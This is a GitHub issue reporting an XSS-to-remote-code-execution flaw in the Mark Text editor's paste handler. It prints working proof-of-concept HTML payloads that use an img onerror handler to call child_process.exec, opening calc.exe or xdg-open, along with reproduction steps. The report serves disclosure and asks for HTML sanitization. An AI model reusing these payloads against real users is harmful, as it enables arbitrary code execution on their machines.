Closed
Description
Description
An attacker can induce Mark Text users to copy the HTML code below to execute a Remote Code Execution attack via XSS.
<!-- for windows -->
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
<!-- for linux (tested with kali) -->
<table><tr><img src onerror="require('child_process').exec('xdg-open .')"></tr></table>The above code is inserted into the Mark Text as a DOM through the source code below, and the remote code execution is performed by calling child_process through the inline script.
marktext/src/muya/lib/contentState/pasteCtrl.js
Lines 44 to 65 in b029938
- Can you reproduce the issue?
Steps to reproduce
- Copy the vulnerable HTML code
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
- Paste it into Mark Text app
Expected behavior:
HTML should be sanitized before pasted into DOM.
Actual behavior:
No HTML sanitize procedure. Only checks if it's wrapped with <table> or not.
Link to an example: [optional]
bandicam.2022-02-08.01-33-25-900-cut.mp4
bandicam.2022-02-08.01-33-25-900.mp4
Versions
- MarkText version:
v0.16.3 - Operating system:
Windows 11Version 21H2 - OS Build 22000.469
Kali LinuxKali GNU/Linux Rolling 2021.4
Metadata
Metadata
Assignees
Labels
No labels